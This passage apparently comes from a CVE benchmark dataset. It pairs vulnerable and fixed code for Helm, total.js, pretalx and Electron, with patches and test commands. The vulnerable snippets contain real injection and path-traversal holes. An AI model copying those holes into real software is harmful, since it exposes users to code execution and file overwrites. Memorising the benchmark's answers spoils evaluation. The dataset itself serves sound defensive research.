{\n+\t\t\t\treturn compListCharts(toComplete, true)\n+\t\t\t}\n+\t\t\treturn nil, cobra.ShellCompDirectiveNoFileComp\n+\t\t},\n+\t\tRunE: func(cmd *cobra.Command, args []string) error {\n+\t\t\tclient.Namespace = settings.Namespace()\n+\n+\t\t\t// Fixes #7002 - Support reading values from STDIN for `upgrade` command\n+\t\t\t// Must load values AFTER determining if we have to call install so that values loaded from stdin are are not read twice\n+\t\t\tif client.Install {\n+\t\t\t\t// If a release does not exist, install it.\n+\t\t\t\thistClient := action.NewHistory(cfg)\n+\t\t\t\thistClient.Max = 1\n+\t\t\t\tif _, err := histClient.Run(args[0]); err == driver.ErrReleaseNotFound {\n+\t\t\t\t\t// Only print this to stdout for table output\n+\t\t\t\t\tif outfmt == output.Table {\n+\t\t\t\t\t\tfmt.Fprintf(out, \"Release %q does not exist. 
Installing it now.\\n\", args[0])\n+\t\t\t\t\t}\n+\t\t\t\t\tinstClient := action.NewInstall(cfg)\n+\t\t\t\t\tinstClient.CreateNamespace = createNamespace\n+\t\t\t\t\tinstClient.ChartPathOptions = client.ChartPathOptions\n+\t\t\t\t\tinstClient.Force = client.Force\n+\t\t\t\t\tinstClient.DryRun = client.DryRun\n+\t\t\t\t\tinstClient.DisableHooks = client.DisableHooks\n+\t\t\t\t\tinstClient.SkipCRDs = client.SkipCRDs\n+\t\t\t\t\tinstClient.Timeout = client.Timeout\n+\t\t\t\t\tinstClient.Wait = client.Wait\n+\t\t\t\t\tinstClient.WaitForJobs = client.WaitForJobs\n+\t\t\t\t\tinstClient.Devel = client.Devel\n+\t\t\t\t\tinstClient.Namespace = client.Namespace\n+\t\t\t\t\tinstClient.Atomic = client.Atomic\n+\t\t\t\t\tinstClient.PostRenderer = client.PostRenderer\n+\t\t\t\t\tinstClient.DisableOpenAPIValidation = client.DisableOpenAPIValidation\n+\t\t\t\t\tinstClient.SubNotes = client.SubNotes\n+\t\t\t\t\tinstClient.Description = client.Description\n+\t\t\t\t\tinstClient.DependencyUpdate = client.DependencyUpdate\n+\t\t\t\t\tinstClient.EnableDNS = client.EnableDNS\n+\n+\t\t\t\t\trel, err := runInstall(args, instClient, valueOpts, out)\n+\t\t\t\t\tif err != nil {\n+\t\t\t\t\t\treturn err\n+\t\t\t\t\t}\n+\t\t\t\t\treturn outfmt.Write(out, &statusPrinter{rel, settings.Debug, false, false})\n+\t\t\t\t} else if err != nil {\n+\t\t\t\t\treturn err\n+\t\t\t\t}\n+\t\t\t}\n+\n+\t\t\tif client.Version == \"\" && client.Devel {\n+\t\t\t\tdebug(\"setting version to >0.0.0-0\")\n+\t\t\t\tclient.Version = \">0.0.0-0\"\n+\t\t\t}\n+\n+\t\t\tchartPath, err := client.ChartPathOptions.LocateChart(args[1], settings)\n+\t\t\tif err != nil {\n+\t\t\t\treturn err\n+\t\t\t}\n+\n+\t\t\tp := getter.All(settings)\n+\t\t\tvals, err := valueOpts.MergeValues(p)\n+\t\t\tif err != nil {\n+\t\t\t\treturn err\n+\t\t\t}\n+\n+\t\t\t// Check chart dependencies to make sure all are present in /charts\n+\t\t\tch, err := loader.Load(chartPath)\n+\t\t\tif err != nil {\n+\t\t\t\treturn err\n+\t\t\t}\n+\t\t\tif req := ch.Metadata.Dependencies; req != nil {\n+\t\t\t\tif err := action.CheckDependencies(ch, req); err != nil {\n+\t\t\t\t\terr = errors.Wrap(err, \"An error occurred while checking for chart dependencies. 
You may need to run `helm dependency build` to fetch missing dependencies\")\n+\t\t\t\t\tif client.DependencyUpdate {\n+\t\t\t\t\t\tman := &downloader.Manager{\n+\t\t\t\t\t\t\tOut: out,\n+\t\t\t\t\t\t\tChartPath: chartPath,\n+\t\t\t\t\t\t\tKeyring: client.ChartPathOptions.Keyring,\n+\t\t\t\t\t\t\tSkipUpdate: false,\n+\t\t\t\t\t\t\tGetters: p,\n+\t\t\t\t\t\t\tRepositoryConfig: settings.RepositoryConfig,\n+\t\t\t\t\t\t\tRepositoryCache: settings.RepositoryCache,\n+\t\t\t\t\t\t\tDebug: settings.Debug,\n+\t\t\t\t\t\t}\n+\t\t\t\t\t\tif err := man.Update(); err != nil {\n+\t\t\t\t\t\t\treturn err\n+\t\t\t\t\t\t}\n+\t\t\t\t\t\t// Reload the chart with the updated Chart.lock file.\n+\t\t\t\t\t\tif ch, err = loader.Load(chartPath); err != nil {\n+\t\t\t\t\t\t\treturn errors.Wrap(err, \"failed reloading chart after repo update\")\n+\t\t\t\t\t\t}\n+\t\t\t\t\t} else {\n+\t\t\t\t\t\treturn err\n+\t\t\t\t\t}\n+\t\t\t\t}\n+\t\t\t}\n+\n+\t\t\tif ch.Metadata.Deprecated {\n+\t\t\t\twarning(\"This chart is deprecated\")\n+\t\t\t}\n+\n+\t\t\t// Create context and prepare the handle of SIGTERM\n+\t\t\tctx := context.Background()\n+\t\t\tctx, cancel := context.WithCancel(ctx)\n+\n+\t\t\t// Set up channel on which to send signal notifications.\n+\t\t\t// We must use a buffered channel or risk missing the signal\n+\t\t\t// if we're not ready to receive when the signal is sent.\n+\t\t\tcSignal := make(chan os.Signal, 2)\n+\t\t\tsignal.Notify(cSignal, os.Interrupt, syscall.SIGTERM)\n+\t\t\tgo func() {\n+\t\t\t\t<-cSignal\n+\t\t\t\tfmt.Fprintf(out, \"Release %s has been cancelled.\\n\", args[0])\n+\t\t\t\tcancel()\n+\t\t\t}()\n+\n+\t\t\trel, err := client.RunWithContext(ctx, args[0], ch, vals)\n+\t\t\tif err != nil {\n+\t\t\t\treturn errors.Wrap(err, \"UPGRADE FAILED\")\n+\t\t\t}\n+\n+\t\t\tif outfmt == output.Table {\n+\t\t\t\tfmt.Fprintf(out, \"Release %q has been upgraded. Happy Helming!\\n\", args[0])\n+\t\t\t}\n+\n+\t\t\treturn outfmt.Write(out, &statusPrinter{rel, settings.Debug, false, false})\n+\t\t},\n+\t}\n+\n+\tf := cmd.Flags()\n+\tf.BoolVar(&createNamespace, \"create-namespace\", false, \"if --install is set, create the release namespace if not present\")\n+\tf.BoolVarP(&client.Install, \"install\", \"i\", false, \"if a release by this name doesn't already exist, run an install\")\n+\tf.BoolVar(&client.Devel, \"devel\", false, \"use development versions, too. Equivalent to version '>0.0.0-0'. If --version is set, this is ignored\")\n+\tf.BoolVar(&client.DryRun, \"dry-run\", false, \"simulate an upgrade\")\n+\tf.BoolVar(&client.Recreate, \"recreate-pods\", false, \"performs pods restart for the resource if applicable\")\n+\tf.MarkDeprecated(\"recreate-pods\", \"functionality will no longer be updated. Consult the documentation for other methods to recreate pods\")\n+\tf.BoolVar(&client.Force, \"force\", false, \"force resource updates through a replacement strategy\")\n+\tf.BoolVar(&client.DisableHooks, \"no-hooks\", false, \"disable pre/post upgrade hooks\")\n+\tf.BoolVar(&client.DisableOpenAPIValidation, \"disable-openapi-validation\", false, \"if set, the upgrade process will not validate rendered templates against the Kubernetes OpenAPI Schema\")\n+\tf.BoolVar(&client.SkipCRDs, \"skip-crds\", false, \"if set, no CRDs will be installed when an upgrade is performed with install flag enabled. 
By default, CRDs are installed if not already present, when an upgrade is performed with install flag enabled\")\n+\tf.DurationVar(&client.Timeout, \"timeout\", 300*time.Second, \"time to wait for any individual Kubernetes operation (like Jobs for hooks)\")\n+\tf.BoolVar(&client.ResetValues, \"reset-values\", false, \"when upgrading, reset the values to the ones built into the chart\")\n+\tf.BoolVar(&client.ReuseValues, \"reuse-values\", false, \"when upgrading, reuse the last release's values and merge in any overrides from the command line via --set and -f. If '--reset-values' is specified, this is ignored\")\n+\tf.BoolVar(&client.Wait, \"wait\", false, \"if set, will wait until all Pods, PVCs, Services, and minimum number of Pods of a Deployment, StatefulSet, or ReplicaSet are in a ready state before marking the release as successful. It will wait for as long as --timeout\")\n+\tf.BoolVar(&client.WaitForJobs, \"wait-for-jobs\", false, \"if set and --wait enabled, will wait until all Jobs have been completed before marking the release as successful. It will wait for as long as --timeout\")\n+\tf.BoolVar(&client.Atomic, \"atomic\", false, \"if set, upgrade process rolls back changes made in case of failed upgrade. The --wait flag will be set automatically if --atomic is used\")\n+\tf.IntVar(&client.MaxHistory, \"history-max\", settings.MaxHistory, \"limit the maximum number of revisions saved per release. Use 0 for no limit\")\n+\tf.BoolVar(&client.CleanupOnFail, \"cleanup-on-fail\", false, \"allow deletion of new resources created in this upgrade when upgrade fails\")\n+\tf.BoolVar(&client.SubNotes, \"render-subchart-notes\", false, \"if set, render subchart notes along with the parent\")\n+\tf.StringVar(&client.Description, \"description\", \"\", \"add a custom description\")\n+\tf.BoolVar(&client.DependencyUpdate, \"dependency-update\", false, \"update dependencies if they are missing before installing the chart\")\n+\tf.BoolVar(&client.EnableDNS, \"enable-dns\", false, \"enable DNS lookups when rendering templates\")\n+\taddChartPathOptionsFlags(f, &client.ChartPathOptions)\n+\taddValueOptionsFlags(f, valueOpts)\n+\tbindOutputFlag(cmd, &outfmt)\n+\tbindPostRenderFlag(cmd, &client.PostRenderer)\n+\n+\terr := cmd.RegisterFlagCompletionFunc(\"version\", func(cmd *cobra.Command, args []string, toComplete string) ([]string, cobra.ShellCompDirective) {\n+\t\tif len(args) != 2 {\n+\t\t\treturn nil, cobra.ShellCompDirectiveNoFileComp\n+\t\t}\n+\t\treturn compVersionFlag(args[1], toComplete)\n+\t})\n+\n+\tif err != nil {\n+\t\tlog.Fatal(err)\n+\t}\n+\n+\treturn cmd\n+}\n\n--- /dev/null\n+++ b/pkg/engine/engine.go\n@@ -0,0 +1,37 @@\n+func addInstallFlags(cmd *cobra.Command, f *pflag.FlagSet, client *action.Install, valueOpts *values.Options) {\n+\tf.BoolVar(&client.CreateNamespace, \"create-namespace\", false, \"create the release namespace if not present\")\n+\tf.BoolVar(&client.DryRun, \"dry-run\", false, \"simulate an install\")\n+\tf.BoolVar(&client.Force, \"force\", false, \"force resource updates through a replacement strategy\")\n+\tf.BoolVar(&client.DisableHooks, \"no-hooks\", false, \"prevent hooks from running during install\")\n+\tf.BoolVar(&client.Replace, \"replace\", false, \"re-use the given name, only if that name is a deleted release which remains in the history. 
This is unsafe in production\")\n+\tf.DurationVar(&client.Timeout, \"timeout\", 300*time.Second, \"time to wait for any individual Kubernetes operation (like Jobs for hooks)\")\n+\tf.BoolVar(&client.Wait, \"wait\", false, \"if set, will wait until all Pods, PVCs, Services, and minimum number of Pods of a Deployment, StatefulSet, or ReplicaSet are in a ready state before marking the release as successful. It will wait for as long as --timeout\")\n+\tf.BoolVar(&client.WaitForJobs, \"wait-for-jobs\", false, \"if set and --wait enabled, will wait until all Jobs have been completed before marking the release as successful. It will wait for as long as --timeout\")\n+\tf.BoolVarP(&client.GenerateName, \"generate-name\", \"g\", false, \"generate the name (and omit the NAME parameter)\")\n+\tf.StringVar(&client.NameTemplate, \"name-template\", \"\", \"specify template used to name the release\")\n+\tf.StringVar(&client.Description, \"description\", \"\", \"add a custom description\")\n+\tf.BoolVar(&client.Devel, \"devel\", false, \"use development versions, too. Equivalent to version '>0.0.0-0'. If --version is set, this is ignored\")\n+\tf.BoolVar(&client.DependencyUpdate, \"dependency-update\", false, \"update dependencies if they are missing before installing the chart\")\n+\tf.BoolVar(&client.DisableOpenAPIValidation, \"disable-openapi-validation\", false, \"if set, the installation process will not validate rendered templates against the Kubernetes OpenAPI Schema\")\n+\tf.BoolVar(&client.Atomic, \"atomic\", false, \"if set, the installation process deletes the installation on failure. The --wait flag will be set automatically if --atomic is used\")\n+\tf.BoolVar(&client.SkipCRDs, \"skip-crds\", false, \"if set, no CRDs will be installed. By default, CRDs are installed if not already present\")\n+\tf.BoolVar(&client.SubNotes, \"render-subchart-notes\", false, \"if set, render subchart notes along with the parent\")\n+\tf.BoolVar(&client.EnableDNS, \"enable-dns\", false, \"enable DNS lookups when rendering templates\")\n+\taddValueOptionsFlags(f, valueOpts)\n+\taddChartPathOptionsFlags(f, &client.ChartPathOptions)\n+\n+\terr := cmd.RegisterFlagCompletionFunc(\"version\", func(cmd *cobra.Command, args []string, toComplete string) ([]string, cobra.ShellCompDirective) {\n+\t\trequiredArgs := 2\n+\t\tif client.GenerateName {\n+\t\t\trequiredArgs = 1\n+\t\t}\n+\t\tif len(args) != requiredArgs {\n+\t\t\treturn nil, cobra.ShellCompDirectiveNoFileComp\n+\t\t}\n+\t\treturn compVersionFlag(args[requiredArgs-1], toComplete)\n+\t})\n+\n+\tif err != nil {\n+\t\tlog.Fatal(err)\n+\t}\n+}\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2023-25165:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/helm\nrm -rf ./pkg/engine/engine_test.go\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ngo test -v -timeout 30s -run ^TestRenderWIthDNS$ helm.sh/helm/v3/pkg/engine\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2023-25165:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/helm\ngit apply --whitespace=nowarn /workspace/fix.patch\ncd pkg/engine && go test -timeout 30s -v\n"} {"cve_id": "CVE-2021-23344", "cve_description": "The package total.js before 3.4.8 are vulnerable to Remote Code Execution (RCE) via set.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an 
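The operative line of the CVE-2023-25165 patch above is easy to miss in the diff noise: when `EnableDNS` is false, the engine replaces sprig's `getHostByName` in the template FuncMap with a stub returning an empty string, so untrusted chart templates can no longer trigger DNS lookups during rendering. A minimal stand-alone sketch of that pattern using only Go's standard `text/template` (this is not Helm's actual engine; `buildFuncMap` is a hypothetical helper):

```go
package main

import (
	"net"
	"os"
	"text/template"
)

// buildFuncMap mirrors the shape of the Helm fix: getHostByName is always
// present so templates keep parsing, but it only performs a real lookup
// when DNS is explicitly enabled; otherwise it returns an empty string.
func buildFuncMap(enableDNS bool) template.FuncMap {
	fm := template.FuncMap{
		"getHostByName": func(name string) string {
			return "" // lookups disabled: neutralize the call
		},
	}
	if enableDNS {
		fm["getHostByName"] = func(name string) string {
			addrs, err := net.LookupHost(name)
			if err != nil || len(addrs) == 0 {
				return ""
			}
			return addrs[0]
		}
	}
	return fm
}

func main() {
	tpl := template.Must(template.New("t").
		Funcs(buildFuncMap(false)). // off by default, like Helm's --enable-dns
		Parse(`host: {{ getHostByName "example.com" }}`))
	_ = tpl.Execute(os.Stdout, nil) // prints "host: " with lookups disabled
}
```

Keeping the function defined but inert, rather than deleting it from the FuncMap, means existing charts still parse; they just stop leaking data through attacker-controlled DNS queries.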
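The patched `upgrade.go` above also routes SIGTERM into context cancellation through a channel of capacity 2, per its comment about missing signals. A runnable illustration of why the buffer matters, independent of Helm (the two-second deadline is an arbitrary stand-in for real work):

```go
package main

import (
	"context"
	"fmt"
	"os"
	"os/signal"
	"syscall"
	"time"
)

func main() {
	ctx, cancel := context.WithCancel(context.Background())
	defer cancel()

	// The buffer is the point: signal.Notify performs a non-blocking send,
	// so with an unbuffered channel a SIGTERM delivered before the goroutine
	// below is parked on <-cSignal would simply be dropped.
	cSignal := make(chan os.Signal, 2)
	signal.Notify(cSignal, os.Interrupt, syscall.SIGTERM)
	go func() {
		<-cSignal
		cancel() // propagate the signal as context cancellation
	}()

	select {
	case <-ctx.Done():
		fmt.Println("operation cancelled")
	case <-time.After(2 * time.Second): // stand-in for the real work
		fmt.Println("operation completed")
	}
}
```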
upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/totaljs/framework", "patch_url": ["https://github.com/totaljs/framework/commit/c812bbcab8981797d3a1b9993fc42dad3d246f04"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_210_1", "commit": "fcdf74c", "file_path": "utils.js", "start_line": 6606, "end_line": 6631, "snippet": "exports.set = function(obj, path, value) {\n\tvar cachekey = 'S+' + path;\n\n\tif (F.temporary.other[cachekey])\n\t\treturn F.temporary.other[cachekey](obj, value);\n\n\tvar arr = parsepath(path);\n\tvar builder = [];\n\n\tfor (var i = 0; i < arr.length - 1; i++) {\n\t\tvar type = arr[i + 1] ? (REGISARR.test(arr[i + 1]) ? '[]' : '{}') : '{}';\n\t\tvar p = 'w' + (arr[i][0] === '[' ? '' : '.') + arr[i];\n\t\tbuilder.push('if(typeof(' + p + ')!==\\'object\\'||' + p + '==null)' + p + '=' + type + ';');\n\t}\n\n\tvar v = arr[arr.length - 1];\n\tvar ispush = v.lastIndexOf('[]') !== -1;\n\tvar a = builder.join(';') + ';var v=typeof(a)===\\'function\\'?a(U.get(b)):a;w' + (v[0] === '[' ? '' : '.') + (ispush ? v.replace(REGREPLACEARR, '.push(v)') : (v + '=v')) + ';return v';\n\n\tif ((/__proto__|constructor|prototype/).test(a))\n\t\tthrow new Error('Prototype pollution');\n\n\tvar fn = new Function('w', 'a', 'b', a);\n\tF.temporary.other[cachekey] = fn;\n\tfn(obj, value, path);\n};"}], "fix_func": [{"id": "fix_js_210_1", "commit": "c812bbcab8981797d3a1b9993fc42dad3d246f04", "file_path": "utils.js", "start_line": 6606, "end_line": 6631, "snippet": "exports.set = function(obj, path, value) {\n\tvar cachekey = 'S+' + path;\n\n\tif (F.temporary.other[cachekey])\n\t\treturn F.temporary.other[cachekey](obj, value);\n\n\tvar arr = parsepath(path);\n\tvar builder = [];\n\n\tfor (var i = 0; i < arr.length - 1; i++) {\n\t\tvar type = arr[i + 1] ? (REGISARR.test(arr[i + 1]) ? '[]' : '{}') : '{}';\n\t\tvar p = 'w' + (arr[i][0] === '[' ? '' : '.') + arr[i];\n\t\tbuilder.push('if(typeof(' + p + ')!==\\'object\\'||' + p + '==null)' + p + '=' + type + ';');\n\t}\n\n\tvar v = arr[arr.length - 1];\n\tvar ispush = v.lastIndexOf('[]') !== -1;\n\tvar a = builder.join(';') + ';var v=typeof(a)===\\'function\\'?a(U.get(b)):a;w' + (v[0] === '[' ? '' : '.') + (ispush ? 
v.replace(REGREPLACEARR, '.push(v)') : (v + '=v')) + ';return v';\n\n\tif ((/__proto__|constructor|prototype|eval/).test(a))\n\t\tthrow new Error('Potential vulnerability');\n\n\tvar fn = new Function('w', 'a', 'b', a);\n\tF.temporary.other[cachekey] = fn;\n\tfn(obj, value, path);\n};"}], "vul_patch": "--- a/utils.js\n+++ b/utils.js\n@@ -17,8 +17,8 @@\n \tvar ispush = v.lastIndexOf('[]') !== -1;\n \tvar a = builder.join(';') + ';var v=typeof(a)===\\'function\\'?a(U.get(b)):a;w' + (v[0] === '[' ? '' : '.') + (ispush ? v.replace(REGREPLACEARR, '.push(v)') : (v + '=v')) + ';return v';\n \n-\tif ((/__proto__|constructor|prototype/).test(a))\n-\t\tthrow new Error('Prototype pollution');\n+\tif ((/__proto__|constructor|prototype|eval/).test(a))\n+\t\tthrow new Error('Potential vulnerability');\n \n \tvar fn = new Function('w', 'a', 'b', a);\n \tF.temporary.other[cachekey] = fn;\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-28458", "cve_description": "pretalx 2.3.1 before 2.3.2 allows path traversal in HTML export (a non-default feature). Organizers can trigger the overwriting (with the standard pretalx 404 page content) of an arbitrary file.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/pretalx/pretalx", "patch_url": ["https://github.com/pretalx/pretalx/commit/60722c43cf975f319e94102e6bff320723776890"], "programing_language": "Python", "vul_func": [{"id": "vul_py_304_1", "commit": "4732e8f", "file_path": "src/pretalx/agenda/management/commands/export_schedule_html.py", "start_line": 112, "end_line": 123, "snippet": "def dump_content(destination, path, getter):\n logging.debug(path)\n content = getter(path)\n if path.endswith(\"/\"):\n path = path + \"index.html\"\n\n path = Path(destination) / path.lstrip(\"/\")\n path.parent.mkdir(parents=True, exist_ok=True)\n\n with open(path, \"wb\") as f:\n f.write(content)\n return content"}, {"id": "vul_py_304_2", "commit": "4732e8f", "file_path": "src/pretalx/agenda/management/commands/export_schedule_html.py", "start_line": 126, "end_line": 135, "snippet": "def get_mediastatic_content(url):\n if url.startswith(settings.STATIC_URL):\n local_path = settings.STATIC_ROOT / url[len(settings.STATIC_URL) :]\n elif url.startswith(settings.MEDIA_URL):\n local_path = settings.MEDIA_ROOT / url[len(settings.MEDIA_URL) :]\n else:\n raise FileNotFoundError()\n\n with open(local_path, \"rb\") as f:\n return f.read()"}], "fix_func": [{"id": "fix_py_304_1", "commit": "60722c43cf975f319e94102e6bff320723776890", "file_path": "src/pretalx/agenda/management/commands/export_schedule_html.py", "start_line": 112, "end_line": 125, "snippet": "def dump_content(destination, path, getter):\n logging.debug(path)\n content = getter(path)\n if path.endswith(\"/\"):\n path = path + \"index.html\"\n\n path = (Path(destination) / path.lstrip(\"/\")).resolve()\n if not Path(destination) in path.parents:\n raise 
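The total.js fix above only widens a deny-list regex (`__proto__|constructor|prototype|eval`) in front of `new Function`, which still compiles a user-influenced string into code. The sturdier shape is to interpret the path as data, walking plain containers so no key name is special, and to allow-list segment syntax up front. A sketch of that idea in Go, the language used for the other examples in this section (`Set` and `segmentOK` are illustrative, not total.js APIs):

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// segmentOK allow-lists plain identifier segments; anything carrying
// quotes, parentheses, or semicolons is refused before any work happens.
// (Illustrative helper, not a total.js API.)
var segmentOK = regexp.MustCompile(`^[A-Za-z_][A-Za-z0-9_]*$`)

// Set walks nested maps instead of compiling the path into source code,
// so even a syntactically valid segment cannot smuggle in behavior.
func Set(obj map[string]any, path string, value any) error {
	parts := strings.Split(path, ".")
	for _, p := range parts {
		if !segmentOK.MatchString(p) {
			return fmt.Errorf("rejected path segment %q", p)
		}
	}
	m := obj
	for _, p := range parts[:len(parts)-1] {
		next, ok := m[p].(map[string]any)
		if !ok {
			next = map[string]any{}
			m[p] = next
		}
		m = next
	}
	m[parts[len(parts)-1]] = value
	return nil
}

func main() {
	obj := map[string]any{}
	fmt.Println(Set(obj, "user.name", "alice"))          // <nil>
	fmt.Println(Set(obj, "name');process.exit(1)//", 1)) // rejected
	fmt.Println(obj)                                     // map[user:map[name:alice]]
}
```

Because nothing here ever generates source code, the deny-list maintenance problem (did we remember `eval`? what about the next gadget?) disappears entirely.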
CommandError(\"Path traversal detected, aborting.\")\n path.parent.mkdir(parents=True, exist_ok=True)\n\n with open(path, \"wb\") as f:\n f.write(content)\n return content"}, {"id": "fix_py_304_2", "commit": "60722c43cf975f319e94102e6bff320723776890", "file_path": "src/pretalx/agenda/management/commands/export_schedule_html.py", "start_line": 128, "end_line": 145, "snippet": "def get_mediastatic_content(url):\n if url.startswith(settings.STATIC_URL):\n local_path = settings.STATIC_ROOT / url[len(settings.STATIC_URL) :]\n elif url.startswith(settings.MEDIA_URL):\n local_path = settings.MEDIA_ROOT / url[len(settings.MEDIA_URL) :]\n else:\n raise FileNotFoundError()\n\n # Prevent directory traversal, make sure the path is inside the media or static root\n local_path = local_path.resolve(strict=True)\n if not any(\n path in local_path.parents\n for path in (settings.MEDIA_ROOT, settings.STATIC_ROOT)\n ):\n raise FileNotFoundError()\n\n with open(local_path, \"rb\") as f:\n return f.read()"}], "vul_patch": "--- a/src/pretalx/agenda/management/commands/export_schedule_html.py\n+++ b/src/pretalx/agenda/management/commands/export_schedule_html.py\n@@ -4,7 +4,9 @@\n if path.endswith(\"/\"):\n path = path + \"index.html\"\n \n- path = Path(destination) / path.lstrip(\"/\")\n+ path = (Path(destination) / path.lstrip(\"/\")).resolve()\n+ if not Path(destination) in path.parents:\n+ raise CommandError(\"Path traversal detected, aborting.\")\n path.parent.mkdir(parents=True, exist_ok=True)\n \n with open(path, \"wb\") as f:\n\n--- a/src/pretalx/agenda/management/commands/export_schedule_html.py\n+++ b/src/pretalx/agenda/management/commands/export_schedule_html.py\n@@ -6,5 +6,13 @@\n else:\n raise FileNotFoundError()\n \n+ # Prevent directory traversal, make sure the path is inside the media or static root\n+ local_path = local_path.resolve(strict=True)\n+ if not any(\n+ path in local_path.parents\n+ for path in (settings.MEDIA_ROOT, settings.STATIC_ROOT)\n+ ):\n+ raise FileNotFoundError()\n+\n with open(local_path, \"rb\") as f:\n return f.read()\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2017-12581", "cve_description": "GitHub Electron before 1.6.8 allows remote command execution because of a nodeIntegration bypass vulnerability. This also affects all applications that bundle Electron code equivalent to 1.6.8 or earlier. Bypassing the Same Origin Policy (SOP) is a precondition; however, recent Electron versions do not have strict SOP enforcement. Combining an SOP bypass with a privileged URL internally used by Electron, it was possible to execute native Node.js primitives in order to run OS commands on the user's host. 
Specifically, a chrome-devtools://devtools/bundled/inspector.html window could be used to eval a Node.js child_process.execFile API call.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/electron/electron", "patch_url": ["https://github.com/electron/electron/commit/05b6d91bf4c1e0ee65eeef70cd5d1bd1df125644"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_81_1", "commit": "3f88eb2", "file_path": "lib/renderer/init.js", "start_line": "1", "end_line": "157", "snippet": "'use strict'\n\nconst events = require('events')\nconst path = require('path')\nconst Module = require('module')\nconst resolvePromise = Promise.resolve.bind(Promise)\n\n// We modified the original process.argv to let node.js load the\n// init.js, we need to restore it here.\nprocess.argv.splice(1, 1)\n\n// Clear search paths.\nrequire('../common/reset-search-paths')\n\n// Import common settings.\nrequire('../common/init')\n\nvar globalPaths = Module.globalPaths\n\n// Expose public APIs.\nglobalPaths.push(path.join(__dirname, 'api', 'exports'))\n\n// The global variable will be used by ipc for event dispatching\nvar v8Util = process.atomBinding('v8_util')\n\nv8Util.setHiddenValue(global, 'ipc', new events.EventEmitter())\n\n// Use electron module after everything is ready.\nconst electron = require('electron')\n\n// Call webFrame method.\nelectron.ipcRenderer.on('ELECTRON_INTERNAL_RENDERER_WEB_FRAME_METHOD', (event, method, args) => {\n electron.webFrame[method](...args)\n})\n\nelectron.ipcRenderer.on('ELECTRON_INTERNAL_RENDERER_SYNC_WEB_FRAME_METHOD', (event, requestId, method, args) => {\n const result = electron.webFrame[method](...args)\n event.sender.send(`ELECTRON_INTERNAL_BROWSER_SYNC_WEB_FRAME_RESPONSE_${requestId}`, result)\n})\n\nelectron.ipcRenderer.on('ELECTRON_INTERNAL_RENDERER_ASYNC_WEB_FRAME_METHOD', (event, requestId, method, args) => {\n const responseCallback = function (result) {\n resolvePromise(result)\n .then((resolvedResult) => {\n event.sender.send(`ELECTRON_INTERNAL_BROWSER_ASYNC_WEB_FRAME_RESPONSE_${requestId}`, null, resolvedResult)\n })\n .catch((resolvedError) => {\n event.sender.send(`ELECTRON_INTERNAL_BROWSER_ASYNC_WEB_FRAME_RESPONSE_${requestId}`, resolvedError)\n })\n }\n args.push(responseCallback)\n electron.webFrame[method](...args)\n})\n\n// Process command line arguments.\nlet nodeIntegration = 'false'\nlet preloadScript = null\nlet isBackgroundPage = 
false\nlet appPath = null\nfor (let arg of process.argv) {\n if (arg.indexOf('--guest-instance-id=') === 0) {\n // This is a guest web view.\n process.guestInstanceId = parseInt(arg.substr(arg.indexOf('=') + 1))\n } else if (arg.indexOf('--opener-id=') === 0) {\n // This is a guest BrowserWindow.\n process.openerId = parseInt(arg.substr(arg.indexOf('=') + 1))\n } else if (arg.indexOf('--node-integration=') === 0) {\n nodeIntegration = arg.substr(arg.indexOf('=') + 1)\n } else if (arg.indexOf('--preload=') === 0) {\n preloadScript = arg.substr(arg.indexOf('=') + 1)\n } else if (arg === '--background-page') {\n isBackgroundPage = true\n } else if (arg.indexOf('--app-path=') === 0) {\n appPath = arg.substr(arg.indexOf('=') + 1)\n }\n}\n\nif (window.location.protocol === 'chrome-devtools:') {\n // Override some inspector APIs.\n require('./inspector')\n nodeIntegration = 'true'\n} else if (window.location.protocol === 'chrome-extension:') {\n // Add implementations of chrome API.\n require('./chrome-api').injectTo(window.location.hostname, isBackgroundPage, window)\n nodeIntegration = 'false'\n} else if (window.location.protocol === 'chrome:') {\n // Disable node integration for chrome UI scheme.\n nodeIntegration = 'false'\n} else {\n // Override default web functions.\n require('./override')\n\n // Inject content scripts.\n require('./content-scripts-injector')\n\n // Load webview tag implementation.\n if (nodeIntegration === 'true' && process.guestInstanceId == null) {\n require('./web-view/web-view')\n 